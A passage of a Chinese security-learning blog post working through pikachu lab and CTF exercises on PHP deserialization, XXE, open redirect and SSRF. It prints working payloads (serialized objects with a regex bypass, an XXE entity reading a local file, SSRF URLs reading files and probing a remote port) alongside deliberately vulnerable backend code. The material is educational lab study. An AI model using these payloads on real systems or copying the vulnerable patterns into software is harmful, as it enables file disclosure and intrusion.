<p>看到include函数，尝试文件包含。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-35-16.png" alt></p>
<p>base64解码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(E_ALL &amp; ~E_NOTICE);</span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Read</span></span>&#123;<span class="comment">//f1a9.php</span></span><br><span class="line">    <span class="keyword">public</span> $file;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file))&#123;</span><br><span class="line">            <span class="keyword">echo</span> file_get_contents(<span class="keyword">$this</span>-&gt;file);    </span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"__toString was called!"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>有一个toString魔法函数，当一个对象被当作字符串处理时就会执行toString函数。先不管，在读取index页面</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-40-51.png" alt></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#index</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(E_ALL &amp; ~E_NOTICE);</span><br><span class="line">$user = $_GET[<span class="string">"user"</span>];</span><br><span class="line">$file = $_GET[<span class="string">"file"</span>];</span><br><span class="line">$pass = $_GET[<span class="string">"pass"</span>];</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($user)&amp;&amp;(file_get_contents($user,<span class="string">'r'</span>)===<span class="string">"admin"</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"hello admin!&lt;br&gt;"</span>;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/f1a9/"</span>,$file))&#123;</span><br><span class="line">        <span class="keyword">exit</span>();</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>($file); <span class="comment">//class.php</span></span><br><span class="line">        $pass = unserialize($pass);<span class="comment">//反序列化</span></span><br><span class="line">        <span class="keyword">echo</span> $pass;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"you are not admin ! "</span>;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"> </span><br><span class="line">&lt;!--</span><br><span class="line">$user = $_GET[<span class="string">"user"</span>];</span><br><span class="line">$file = $_GET[<span class="string">"file"</span>];</span><br><span class="line">$pass = $_GET[<span class="string">"pass"</span>];</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($user)&amp;&amp;(file_get_contents($user,<span class="string">'r'</span>)===<span class="string">"admin"</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"hello admin!&lt;br&gt;"</span>;</span><br><span class="line">    <span class="keyword">include</span>($file); <span class="comment">//class.php</span></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"you are not admin ! "</span>;</span><br><span class="line">&#125;</span><br><span class="line"> --&gt;</span><br></pre></td></tr></table></figure>
<p>可以看到主页进制我们读f1a9.php文件。并且echo了pass。因此需要构造pass序列化字符串，并且file属性为f1a9.php。</p>
<p>构造如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:<span class="number">4</span>:<span class="string">"Read"</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">"file"</span>;s:<span class="number">8</span>:<span class="string">"f1a9.php"</span>;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-45-46.png" alt></p>
<p>源码：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-09-12_19-46-25.png" alt></p>
<hr>
<p>2019年10月26日更新</p>
<p>在构造反序列化代码最好还是用php一次性构造，否则一些不可见字符是无法我们手工输入准确的。</p>
<p>比如<a href="https://adworld.xctf.org.cn/task/answer?type=web&amp;number=3&amp;grade=1&amp;id=5409&amp;page=2" target="_blank" rel="noopener">xctf</a>这题。</p>
<p>这题其实比较新的就是这段过滤代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (preg_match(<span class="string">'/[oc]:\d+:/i'</span>, $var)) &#123; </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'stop hacking!'</span>);</span><br></pre></td></tr></table></figure>
<p>==不过我们修改对象名字长度为+\d,那么就能绕过认证。==</p>
<p>最终这题的payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Demo</span> </span>&#123; </span><br><span class="line">    <span class="keyword">private</span> $file = <span class="string">'index.php'</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($file)</span> </span>&#123; </span><br><span class="line">        <span class="keyword">$this</span>-&gt;file = $file; </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>&#123; </span><br><span class="line">        <span class="keyword">echo</span> @highlight_file(<span class="keyword">$this</span>-&gt;file, <span class="keyword">true</span>); </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span> </span>&#123; </span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;file != <span class="string">'index.php'</span>) &#123; </span><br><span class="line">            <span class="comment">//the secret is in the fl4g.php</span></span><br><span class="line">            <span class="keyword">$this</span>-&gt;file = <span class="string">'index.php'</span>; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br><span class="line">$a = <span class="keyword">new</span> Demo(<span class="string">"fl4g.php"</span>);</span><br><span class="line">$test = serialize($a);</span><br><span class="line"></span><br><span class="line">var_dump($test);</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"\n"</span>);</span><br><span class="line"><span class="comment">// $test = 'O:+4:"Demo":2:&#123;s:10:"Demofile";s:8:"fl4g.php";&#125;';</span></span><br><span class="line">$test = str_replace(<span class="string">"O:4"</span>,<span class="string">"O:+4"</span>,$test);</span><br><span class="line">$test = str_replace(<span class="string">":1:"</span>,<span class="string">":2:"</span>,$test);</span><br><span class="line"><span class="comment">// var_dump($test);</span></span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"\n"</span>);</span><br><span class="line"><span class="keyword">echo</span> base64_encode($test);</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"\n"</span>);</span><br><span class="line"><span class="comment">// echo($test);</span></span><br></pre></td></tr></table></figure>
<p>这里想强调的是在生成序列化的过程中最好一次性由php生成。否则会出一些纰漏。</p>
<p>比如</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-10-26_17-09-00.png" alt></p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master//img/Snipaste_2019-10-26_17-09-54.png" alt></p>
<p>$test1</p>
<p>和$test2变量在字符层面看不出差距，但var_dump明显长度不同。这是因为php反序列化对象时会用不可见字符修饰不同属性。</p>
<h1 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h1><h3 id="概述-3"><a href="#概述-3" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>XXE -“xml external entity injection”<br>既”xml外部实体注入漏洞”。<br>概括一下就是”攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题”<br>也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。<br>具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。<br>现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。<br>以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。<br>本章提供的案例中,为了模拟漏洞,通过手动指定LIBXML_NOENT选项开启了xml外部实体解析。</p>
</blockquote>
<h3 id="0x01-举例"><a href="#0x01-举例" class="headerlink" title="0x01 举例"></a>0x01 举例</h3><p>提交payload：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version = "1.0"?&gt;</span> </span><br><span class="line"><span class="meta">&lt;!DOCTYPE ANY [ &lt;!ENTITY f SYSTEM "file:///d:/input.txt"&gt; ]&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="name">x</span>&gt;</span>&amp;f;<span class="tag">&lt;/<span class="name">x</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>可读取d:盘的input文件。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_20-12-23.png" alt></p>
<p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$html=<span class="string">''</span>;</span><br><span class="line"><span class="comment">//考虑到目前很多版本里面libxml的版本都&gt;=2.9.0了,所以这里添加了LIBXML_NOENT参数开启了外部实体解析</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]) <span class="keyword">and</span> $_POST[<span class="string">'xml'</span>] != <span class="keyword">null</span>)&#123;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    $xml =$_POST[<span class="string">'xml'</span>];</span><br><span class="line"><span class="comment">//    $xml = $test;</span></span><br><span class="line">    $data = @simplexml_load_string($xml,<span class="string">'SimpleXMLElement'</span>,LIBXML_NOENT);</span><br><span class="line">    <span class="keyword">if</span>($data)&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;pre&gt;&#123;$data&#125;&lt;/pre&gt;"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;p&gt;XML声明、DTD文档类型定义、文档元素这些都搞懂了吗?&lt;/p&gt;"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="不安全url重定向"><a href="#不安全url重定向" class="headerlink" title="不安全url重定向"></a>不安全url重定向</h1><h3 id="概述-4"><a href="#概述-4" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>  不安全的url跳转问题可能发生在一切执行了url地址跳转的地方。<br>如果后端采用了前端传进来的(可能是用户传参,或者之前预埋在前端页面的url地址)参数作为了跳转的目的地,而又没有做判断的话<br>就可能发生”跳错对象”的问题。 </p>
<p>url跳转比较直接的危害是:<br>–&gt;钓鱼,既攻击者使用漏洞方的域名(比如一个比较出名的公司域名往往会让用户放心的点击)做掩盖,而最终跳转的确实钓鱼网站</p>
<p>这个漏洞比较简单,come on,来测一把!  </p>
</blockquote>
<h3 id="0x01-举例-1"><a href="#0x01-举例-1" class="headerlink" title="0x01 举例"></a>0x01 举例</h3><p>后端通过url参数传来的值做为跳转目的。</p>
<p>如果url值为<a href="http://www.baidu.com" target="_blank" rel="noopener">www.baidu.com</a></p>
<p>即:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/vul/urlredirect/urlredirect.php?url=https://www.baidu.com</span><br></pre></td></tr></table></figure>
<p>可成功跳转到百度。</p>
<p>后台代码;</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$html=<span class="string">""</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'url'</span>]) &amp;&amp; $_GET[<span class="string">'url'</span>] != <span class="keyword">null</span>)&#123;</span><br><span class="line">    $url = $_GET[<span class="string">'url'</span>];</span><br><span class="line">    <span class="keyword">if</span>($url == <span class="string">'i'</span>)&#123;</span><br><span class="line">        $html.=<span class="string">"&lt;p&gt;好的,希望你能坚持做你自己!&lt;/p&gt;"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">        header(<span class="string">"location:&#123;$url&#125;"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h1 id="ssrf"><a href="#ssrf" class="headerlink" title="ssrf"></a>ssrf</h1><h3 id="概述-5"><a href="#概述-5" class="headerlink" title="概述"></a>概述</h3><blockquote>
<p>SSRF(Server-Side Request Forgery:服务器端请求伪造)</p>
<p>其形成的原因大都是由于服务端<strong>提供了从其他服务器应用获取数据的功能</strong>,但又没有对目标地址做严格过滤与限制</p>
<p>​             导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据</p>
<p>​             数据流:攻击者—–&gt;服务器—-&gt;目标地址</p>
<p>​             根据后台使用的函数的不同,对应的影响和利用方法又有不一样             </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&gt; PHP中下面函数的使用不当会导致SSRF:</span><br><span class="line">&gt; file_get_contents()</span><br><span class="line">&gt; fsockopen()</span><br><span class="line">&gt; curl_exec()</span><br><span class="line">&gt;             </span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<blockquote>
<p>​             如果一定要通过后台服务器远程去对用户指定(“或者预埋在前端的请求”)的地址进行资源请求,</p>
<p>则请做好目标地址的过滤</p>
<p>。 </p>
<p>​              你可以根据”SSRF”里面的项目来搞懂问题的原因          </p>
</blockquote>
<h3 id="0x01-curl"><a href="#0x01-curl" class="headerlink" title="0x01 curl"></a>0x01 curl</h3><p>payload1：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/vul/ssrf/ssrf_curl.php?url=file:///d:/input.txt</span><br></pre></td></tr></table></figure>
<p>可读取任意文件:</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_21-00-10.png" alt></p>
<p>payload2:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/vul/ssrf/ssrf_curl.php?url=http://http://129.211.73.107:22(远程主机)</span><br></pre></td></tr></table></figure>
<p>可看到远程主机22端口信息。</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-07-27_21-01-40.png" alt></p>
<p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'url'</span>]) &amp;&amp; $_GET[<span class="string">'url'</span>] != <span class="keyword">null</span>)&#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//接收前端URL没问题,但是要做好过滤,如果不做过滤,就会导致SSRF</span></span><br><span class="line">    $URL = $_GET[<span class="string">'url'</span>];</span><br><span class="line">    $CH = curl_init($URL);</span><br><span class="line">    curl_setopt($CH, CURLOPT_HEADER, <span class="keyword">FALSE</span>);</span><br><span class="line">    curl_setopt($CH, CURLOPT_SSL_VERIFYPEER, <span class="keyword">FALSE</span>);</span><br><span class="line">    $RES = curl_exec($CH);</span><br><span class="line">    curl_close($CH) ;</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web安全/" rel="tag"># web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/24/pikachu漏洞平台学习（6）/" rel="next" title="pikachu漏洞平台学习（6）">
                <i class="fa fa-chevron-left"></i> pikachu漏洞平台学习（6）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/30/sql注入-基于sqli-labs/" rel="prev" title="sql注入--基于sqli-labs">
                sql注入--基于sqli-labs <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/pikachu.jpg" alt="srat1999">
            
              <p class="site-author-name" itemprop="name">srat1999</p>
              <p class="site-description motion-element" itemprop="description">the higher you stand the more you can see</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">55</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/srat1999" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:srat1999@163.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#越权"><span class="nav-number">1.</span> <span class="nav-text">越权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述"><span class="nav-number">1.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-水平越权"><span class="nav-number">1.0.2.</span> <span class="nav-text">0x01 水平越权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-垂直越权"><span class="nav-number">1.0.3.</span> <span class="nav-text">0x02 垂直越权</span></a></li></ol></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#敏感信息泄露"><span class="nav-number">2.</span> <span class="nav-text">敏感信息泄露</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述-1"><span class="nav-number">2.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01举例"><span class="nav-number">2.0.2.</span> <span class="nav-text">0x01举例</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#php反序列化"><span class="nav-number">3.</span> <span class="nav-text">php反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述-2"><span class="nav-number">3.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-php反序列化漏洞"><span class="nav-number">3.0.2.</span> <span class="nav-text">0x01 php反序列化漏洞</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XXE"><span class="nav-number">4.</span> <span class="nav-text">XXE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述-3"><span class="nav-number">4.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-举例"><span class="nav-number">4.0.2.</span> <span class="nav-text">0x01 举例</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#不安全url重定向"><span class="nav-number">5.</span> <span class="nav-text">不安全url重定向</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述-4"><span class="nav-number">5.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-举例-1"><span class="nav-number">5.0.2.</span> <span class="nav-text">0x01 举例</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ssrf"><span class="nav-number">6.</span> <span class="nav-text">ssrf</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述-5"><span class="nav-number">6.0.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-curl"><span class="nav-number">6.0.2.</span> <span class="nav-text">0x01 curl</span></a></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">srat1999</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">70.1k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







  <div>
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1278555274'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1278555274%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script>
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1278555274'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1278555274%26online%3D1%26show%3Dline' type='text/javascript'%3E%3C/script%3E"));</script>
  </div>
 



        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
